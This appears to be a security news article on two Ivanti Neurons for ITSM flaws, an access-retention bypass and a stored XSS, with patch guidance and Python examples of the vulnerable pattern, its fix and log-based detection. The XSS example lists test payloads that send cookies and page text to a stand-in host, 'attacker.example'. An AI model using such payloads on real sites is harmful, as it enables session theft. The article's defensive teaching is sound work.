Ivanti Neurons for ITSM Flaws Let Attackers Retain Access and Steal Session Data
Key Takeaways
- Ivanti has released urgent security updates for its Neurons for ITSM (N-ITSM) platform.
- Two medium-severity vulnerabilities, CVE-2026-4913 and CVE-2026-4914, could let an authenticated attacker keep access after their account is disabled, or steal data from other users' browser sessions.
- The flaws affect Ivanti N-ITSM versions prior to 2025.4, impacting both on-premise and cloud deployments.
- On-premise customers must manually upgrade to version 2025.4; cloud environments were patched by Ivanti on December 12, 2025.
- No active exploitation of these vulnerabilities has been observed by Ivanti at the time of disclosure.
Ivanti has issued security updates for its IT service management platform, Ivanti Neurons for ITSM (N-ITSM), addressing two medium-severity vulnerabilities that affect both on-premise and cloud deployments. These flaws could allow authenticated attackers to maintain unauthorized system access or compromise session data belonging to other users.
The company confirmed that it has no evidence of active exploitation for either vulnerability. Both issues were identified and reported through Ivanti’s responsible disclosure program and have been resolved in the recently released version 2025.4.
CVE-2026-4913: Improper Path Protection Allows Persistent Access
The first vulnerability, identified as CVE-2026-4913, carries a CVSS score of 5.7 (Medium) and is classified as CWE-424 (Improper Protection of Alternate Path). The flaw is an inadequate protection mechanism on an alternate access path within Ivanti N-ITSM versions preceding 2025.4: the main path enforces the account check, but another route to the same functionality does not.
Exploitation of this vulnerability could enable a remote, authenticated attacker to retain access to the system even after an administrator has disabled their account. This bypass mechanism presents a significant risk, particularly in corporate settings where the immediate revocation of access is a crucial security measure, especially during employee offboarding or in response to insider threats.
The vulnerability is exploitable over the network, requires only low privileges (an existing account), and needs user interaction to be triggered, which is why it rates only Medium despite the practical impact of a revocation bypass.
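The following is an added example, not Ivanti's code and not a reproduction of the N-ITSM flaw, that shows the general shape of a CWE-424 access-retention bug: disabling an account sweeps the interactive sessions but leaves a second, alternate credential path (here a hypothetical API token table) unchecked, beside a hardened variant that resolves the principal and refuses disabled accounts on every path. The `User`, `Store` and service classes are all invented for the illustration.

```python
"""Illustration of the CWE-424 pattern (an alternate path that skips the
account-state check). Hypothetical example written for this article: it is
not Ivanti's code and does not reproduce the N-ITSM flaw itself."""
import secrets
from dataclasses import dataclass, field


@dataclass
class User:
    name: str
    disabled: bool = False


@dataclass
class Store:
    users: dict = field(default_factory=dict)
    sessions: dict = field(default_factory=dict)    # session id -> user name
    api_tokens: dict = field(default_factory=dict)  # API token  -> user name


class VulnerableService:
    """Disabling an account sweeps the interactive sessions, but the API
    token path is an alternate path that never re-checks account state."""

    def __init__(self, store):
        self.store = store

    def login(self, name):
        sid = secrets.token_hex(16)
        self.store.sessions[sid] = name
        return sid

    def issue_api_token(self, name):
        tok = secrets.token_hex(16)
        self.store.api_tokens[tok] = name
        return tok

    def disable_user(self, name):
        self.store.users[name].disabled = True
        for sid in [s for s, u in self.store.sessions.items() if u == name]:
            del self.store.sessions[sid]
        # bug: api_tokens is not swept, so a token issued earlier keeps working

    def request_with_session(self, sid):
        return sid in self.store.sessions

    def request_with_token(self, tok):
        return tok in self.store.api_tokens   # "credential exists" == authorized


class HardenedService(VulnerableService):
    """Every authenticated path resolves the principal and refuses disabled
    accounts, and disabling revokes every credential type the user holds."""

    def _active_user(self, name):
        user = self.store.users.get(name)
        return None if user is None or user.disabled else user

    def disable_user(self, name):
        self.store.users[name].disabled = True
        for table in (self.store.sessions, self.store.api_tokens):
            for key in [k for k, u in table.items() if u == name]:
                del table[key]

    def request_with_session(self, sid):
        return self._active_user(self.store.sessions.get(sid)) is not None

    def request_with_token(self, tok):
        return self._active_user(self.store.api_tokens.get(tok)) is not None


def demo():
    """Return {variant: (session_still_works, token_still_works)} measured
    after the account has been disabled."""
    results = {}
    for label, cls in (("vulnerable", VulnerableService),
                       ("hardened", HardenedService)):
        svc = cls(Store(users={"alice": User("alice")}))
        sid = svc.login("alice")
        tok = svc.issue_api_token("alice")
        svc.disable_user("alice")
        results[label] = (svc.request_with_session(sid),
                          svc.request_with_token(tok))
    return results


if __name__ == "__main__":
    print(demo())  # {'vulnerable': (False, True), 'hardened': (False, False)}
```

The hardened class does two things on purpose: it revokes every credential table on disable, and it still checks the account state on each request. The second check is what survives when someone later adds a third path (a mobile token, a webhook secret) and forgets to add it to the sweep.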
CVE-2026-4914: Stored XSS Leads to Cross-Session Data Theft
The second vulnerability, CVE-2026-4914, is a stored cross-site scripting (XSS) flaw with a CVSS score of 5.4 (Medium), categorized under CWE-79. This vulnerability, present in Ivanti N-ITSM versions prior to 2025.4, permits a remote, authenticated attacker to inject malicious scripts. These scripts would then execute within the browser sessions of other users.
Successful exploitation could allow an attacker to harvest limited information from other user sessions, potentially including session tokens, credentials, or other sensitive ITSM data. Because the injected script runs inside the victim's authenticated browser session, it can read whatever the page exposes and issue requests as the victim; a session cookie set with the HttpOnly flag cannot be read by script directly, but that does not stop the script from using it indirectly. The attack requires user interaction, meaning a victim must view the page that contains the stored malicious content for the exploit to succeed. The Scope: Changed (S:C) component of the CVSS vector reflects that the vulnerable component is the N-ITSM server while the impact lands in a different component, another user's browser.
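As an added example (not Ivanti's code, and not the N-ITSM bug itself), the block below renders a stored free-text field three ways: raw interpolation, a blocklist that strips `<script>` and nothing else, and HTML output encoding. The payloads, the template and the `contains_active_markup` scorer are constructed for the illustration.

```python
"""Stored XSS in a comment/ticket field: vulnerable rendering, a blocklist
that looks fixed but is not, and output encoding. Added example written for
this article; it is not Ivanti's code and does not reproduce the N-ITSM bug."""
import html
import re

# Constructed test payloads a reviewer would feed a free-text field.
PAYLOADS = [
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    '<img src=x onerror="fetch(\'https://attacker.example/?d=\' + document.body.innerText)">',
    '"><svg onload=alert(1)>',
]

TEMPLATE = '<div class="comment" data-author="{author}">{body}</div>'


def render_vulnerable(author, body):
    """Stored text interpolated straight into HTML."""
    return TEMPLATE.format(author=author, body=body)


def render_blocklist(author, body):
    """Common mistake: strip the one tag name people know and call it fixed."""
    cleaned = re.sub(r"(?i)</?script[^>]*>", "", body)
    return TEMPLATE.format(author=author, body=cleaned)


def render_hardened(author, body):
    """Encode for the HTML context; quote=True also covers attribute values."""
    return TEMPLATE.format(author=html.escape(author, quote=True),
                           body=html.escape(body, quote=True))


TAG_RE = re.compile(r"<\s*([a-zA-Z][\w-]*)([^>]*)>")
ACTIVE_TAGS = {"script", "img", "svg", "iframe", "object", "embed"}


def contains_active_markup(rendered):
    """Crude scorer for the demo: any surviving raw tag that is scriptable or
    carries an on* handler means the payload is live in the page."""
    for m in TAG_RE.finditer(rendered):
        tag, attrs = m.group(1).lower(), m.group(2)
        if tag in ACTIVE_TAGS or re.search(r"\bon\w+\s*=", attrs, re.I):
            return True
    return False


def score():
    """{renderer: [payload is live?, ...]} for each payload in PAYLOADS."""
    renderers = (("vulnerable", render_vulnerable),
                 ("blocklist", render_blocklist),
                 ("hardened", render_hardened))
    return {name: [contains_active_markup(fn("mallory", p)) for p in PAYLOADS]
            for name, fn in renderers}


if __name__ == "__main__":
    for name, hits in score().items():
        print(f"{name:10s} {hits}")
```

`html.escape` is the right encoder for HTML text nodes and double-quoted attribute values; data landing in a JavaScript string, a URL or a CSS value needs that context's encoder instead. A Content-Security-Policy that disallows inline script is worth deploying as a second layer, but it is not a substitute for encoding the stored content.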
Both vulnerabilities impact Ivanti Neurons for ITSM version 2025.3 and all previous releases, affecting both on-premise and cloud-based deployments.
- On-premise customers are required to manually upgrade their installations to version 2025.4, which is available via the Ivanti License System (ILS).
- Cloud customers are not required to take any action, as Ivanti automatically applied the necessary fixes to all cloud environments on December 12, 2025.
Ivanti strongly advises all on-premise customers to implement the 2025.4 update without delay. No indicators of compromise have been published, since no exploitation has been observed.
Organizations operating older versions of Ivanti Neurons for ITSM should prioritize this upgrade, especially considering the significant access-retention risk posed by CVE-2026-4913 in environments that enforce stringent access control policies.
What You Should Do
- On-Premise Customers: Immediately upgrade your Ivanti Neurons for ITSM deployment to version 2025.4. Obtain the update through the Ivanti License System (ILS).
- Cloud Customers: No action is required. Ivanti has already applied the necessary patches to all cloud environments.
- Review Access Policies: Regularly audit user accounts and access privileges. After disabling an account, confirm that its existing sessions and any API tokens or other long-lived credentials it held are revoked as well, not just the interactive login.
- Educate Users: Remind users about the risks of interacting with suspicious or unexpected content, especially within IT service management platforms, to mitigate XSS risks.
- Monitor for Anomalies: While no active exploitation is known, watch for unusual activity in your ITSM environment, in particular successful requests attributed to an account after it was disabled.
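To make the "Review Access Policies" and "Monitor for Anomalies" items concrete, here is an added detection sketch (not Ivanti tooling). It joins an admin audit stream against an access stream and flags every successful request made by an account after the audit trail says it was disabled. The log format and the sample lines are constructed for the example; the N-ITSM log format is not reproduced here, so the parser would need adapting to real exports.

```python
"""Detection sketch: flag successful requests attributed to an account after
the audit trail shows it was disabled. Added example, not Ivanti tooling;
the log format below is constructed for the illustration and is not the
N-ITSM log format."""
import re
from datetime import datetime, timezone

# Constructed sample data: one admin audit stream and one access stream.
AUDIT_LOG = """\
2025-12-15T08:00:12Z actor=itadmin action=user_disabled target=jdoe
2025-12-15T09:30:00Z actor=itadmin action=user_disabled target=contractor7
"""

ACCESS_LOG = """\
2025-12-15T07:59:50Z user=jdoe auth=session src=10.0.5.21 path=/tickets/1234 status=200
2025-12-15T08:05:03Z user=jdoe auth=api_token src=10.0.5.21 path=/api/v1/tickets status=200
2025-12-15T08:07:41Z user=jdoe auth=api_token src=10.0.5.21 path=/api/v1/tickets/export status=200
2025-12-15T08:10:00Z user=msmith auth=session src=10.0.5.40 path=/tickets/1235 status=200
2025-12-15T09:29:59Z user=contractor7 auth=session src=203.0.113.9 path=/tickets/77 status=200
2025-12-15T09:31:10Z user=contractor7 auth=session src=203.0.113.9 path=/tickets/77 status=403
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """'<ISO8601 Z> key=value key=value ...' -> dict with a tz-aware 'ts'."""
    ts_text, _, rest = line.partition(" ")
    fields = dict(KV_RE.findall(rest))
    fields["ts"] = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ").replace(
        tzinfo=timezone.utc)
    return fields


def parse_log(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def disable_times(audit_records):
    """Earliest user_disabled event per target account."""
    out = {}
    for rec in audit_records:
        if rec.get("action") == "user_disabled":
            target = rec["target"]
            out[target] = min(out[target], rec["ts"]) if target in out else rec["ts"]
    return out


def find_post_disable_access(audit_text=AUDIT_LOG, access_text=ACCESS_LOG):
    """Successful (2xx) requests by an account after its disable time.
    A 4xx after disable is the control working; a 2xx is an alternate path
    the revocation did not cover."""
    cutoffs = disable_times(parse_log(audit_text))
    findings = []
    for rec in parse_log(access_text):
        user = rec.get("user")
        if (user in cutoffs and rec["ts"] > cutoffs[user]
                and rec.get("status", "").startswith("2")):
            findings.append({"user": user, "ts": rec["ts"].isoformat(),
                             "auth": rec.get("auth"), "path": rec.get("path"),
                             "src": rec.get("src")})
    return findings


if __name__ == "__main__":
    for finding in find_post_disable_access():
        print("post-disable access:", finding)
```

On the sample data the two `api_token` requests by `jdoe` after 08:00:12Z are flagged, while `contractor7`'s 403 after disable is not, which is the distinction that matters: a denied request shows revocation working, an accepted one shows the path it missed.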
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.